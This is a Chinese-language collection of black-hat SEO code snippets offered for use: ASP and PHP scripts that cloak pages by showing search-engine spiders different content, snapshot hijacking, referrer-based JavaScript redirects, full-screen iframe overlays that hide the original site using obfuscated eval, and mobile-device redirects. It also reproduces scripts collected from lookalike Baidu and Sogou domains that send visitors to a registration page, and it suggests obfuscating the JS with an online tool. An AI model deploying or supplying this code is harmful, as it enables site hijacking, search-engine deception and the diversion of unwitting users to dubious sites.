黑帽站群常用跳转JS广告代码汇总
1:网站快照劫持代码
<%@ LANGUAGE = VBScript.Encode %><% Dim agent agent=Request.ServerVariables("http_user_agent") If instr(agent,"Baiduspider") > 0 or instr(agent,"baidubrowser") > 0 or instr(agent,"Sogou") > 0 or instr(agent,"googlebot") > 0 or instr(agent,"Sosospider") > 0 then linkurl="http://这里填网址" *快照网址 Function GetBody(Url) Dim objXML On Error Resume Next Set objXML = CreateObject("Microsoft.XMLHTTP") With objXML .Open "Get", Url, False, "", "" .Send GetBody = .ResponseBody End With GetBody=BytesToBstr(GetBody,"GB2312") Set objXML = Nothing End Function Function BytesToBstr(strBody,CodeBase) dim objStream set objStream = Server.CreateObject("Adodb.Stream") objStream.Type = 1 objStream.Mode =3 objStream.Open objStream.Write strBody objStream.Position = 0 objStream.Type = 2 objStream.Charset = CodeBase BytesToBstr = objStream.ReadText objStream.Close set objStream = nothing End Function response.write GetBody(linkurl) End if%> <script LANGUAGE="Javascript"> var s=document.referrer if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 ) location.href="这里填跳转地址"; </script>
2:上方显示广告,下方显示原站内容
document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='7350' allowTransparency src=http://这里填网址></iframe>");
3:全屏覆盖只能看到广告
var ss = '<center id="showcloneshengxiaon"><ifr'+'ame scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="14'+'00" height="50'+'50" src="http://这里填网址"></iframe></center>'; eval("do"+"cu"+"ment.wr"+"ite('"+ss+"');"); try{ setInterval(function(){ try{ document.getElementById("div"+"All").style.display="no"+"ne"; }catch(e){} for(var i=0;i<document.body.children.length;i++){ try{ var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id; if(myid!="iconDiv1" && myid!="showcloneshengxiaon"){ // if(tagname!="center"){ document.body.children[i].style.display="non"+"e"; //} } }catch(e){} } },100); }catch(e){}
4:搜索引擎来路直接跳JS代码
document.writeln("<script LANGUAGE="Javascript">"); document.writeln("var s=document.referrer"); document.writeln("if(s.indexOf("baidu")>0 || s.indexOf("sogou")>0 || s.indexOf("soso")>0 ||s.indexOf("sm")>0 ||s.indexOf("uc")>0 ||s.indexOf("bing")>0 ||s.indexOf("yahoo")>0 ||s.indexOf("so")>0 )"); document.writeln("location.href="这里填网址";"); document.writeln("</script>");
5:根据不同关键词跳转不同的网址代码
var title = window["document"]["title"]; title = decodeURI(title); if(title.indexOf("u9ed1u5e3d") > -1){ jumpto("https://www.0116.net/"); //根据上方的Unicode转码关键词黑帽跳转到这个网址 } else if(title.indexOf("转码关键词") > -1){ jumpto("http://这里填网址"); } else if(title.indexOf("转码关键词") > -1){ jumpto("http://这里填网址"); } else if(title.indexOf("转码关键词") > -1){ jumpto("http://这里填网址"); } else { jumpto("http://这里填无关键词跳转网址"); }
6:打开网站标题正常,快照标题异常
<title>转码后的标题,用于劫持快照</title> <script>document.title='网站打开后浏览器显示的标题';</script>
function jumurl(){ window.location.href = 'http://这里填网址' } setTimeout(jumurl,2000); jumurl();
ar d=document.referrer; if (d.indexOf("link?url")>0 || d.indexOf("%A8%B1")>0 || d.indexOf("%9F%8E")>0){ self.location="http://这里填网址"; opener.location.href='http://这里是双跳网址'; }
识别蜘蛛,蜘蛛劫持,访客区分展示代码
<?php $agent = strtolower($_SERVER['HTTP_USER_AGENT']); $baiduspider = stripos($agent,'Baiduspider'); if(stripos($agent,'baiduspider') >-1 || stripos($agent,'360Spider') >-1 || stripos($agent,'sogou')>-1 || stripos($agent,'yisouspider') >-1) else{ header('Content-Type:text/html;charset=gbk'); $url="广告页面示范https://www.186seo.com"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //将curl_exec()获取的信息以文件流的形式返回,而不是直接输出。 curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // 信任任何证书 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); // 检查证书中是否设置域名 $r=curl_exec($ch); curl_close($ch); echo $r; exit; } ?>
收集的refer搜狗来路跳转代码:
下面这行加在html里
<script type="text/javascript" src="http://m.sogou.com.777sp.xyz/static/v2/mip.js"></script>
http://m.sogou.com.777sp.xyz/static/v2/mip.js JS里面的代码如下:
var refurl=document.referrer
if(refurl.indexOf("sogou")>0 || refurl.indexOf("baidu")>0 ||refurl.indexOf("sm")>0 || refurl.indexOf("so")>0 )
window.location.href="http://5588054.com/register?id=10864409";
收集来的refer百度来路跳转代码:
<script type="text/javascript" src="http://www.baidu.com.hhxlt.com/static/v2/mip.js"></script>
http://www.baidu.com.hhxlt.com/static/v2/mip.js JS里面的代码如下:
var refurl=document.referrer
if(refurl.indexOf("sogou")>0 || refurl.indexOf("baidu")>0 ||refurl.indexOf("sm")>0 || refurl.indexOf("so")>0 )
window.location.href="http://5588054.com/register?id=10864409";
收集的来自神马的另外一段JS跳转:
在html头文件里加上这个 <script type="text/javascript" src="/js/common.js"></script>
document.write ('<script type="text/javascript" src="https://js.users.51.la/20614279.js"></script>');
document.writeln("<script language=\'JavaScript\' src=\'https://www.j666666s.com/3.js\'></script>");
猜测第一段51.la的是51la红包广告或流量统计,看了代码乱七八糟的没有参考价值。
第二段为识别移动设备跳转:
https://www.j666666s.com/3.js 的JS内容为:
var url = "http://kiss.zjh19.com:165/az.asp";
try {
var urlhash = window.location.hash;
if (!urlhash.match("fromapp")) {
if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Fennec|BlackBerry|Mobile|IEMobile|MQQBrowser|JUC|Fennec|WosBrowser|BrowserNG|WebOS|Symbian)/i))) {
window.location = "http://kiss.zjh19.com:165/az.asp";
}
}
} catch (err) {}
分析代码:识别移动设备和移动浏览器,然后跳转到http://kiss.zjh19.com:165/az.asp 这个页面。
打开直接跳,不跳蜘蛛,写在.js文件里,然后把js到站长工具里加密:http://tool.chinaz.com/js.aspx
function jumurl(){
window.location.href = 'http://这里填网址'
}
setTimeout(jumurl,2000);
jumurl();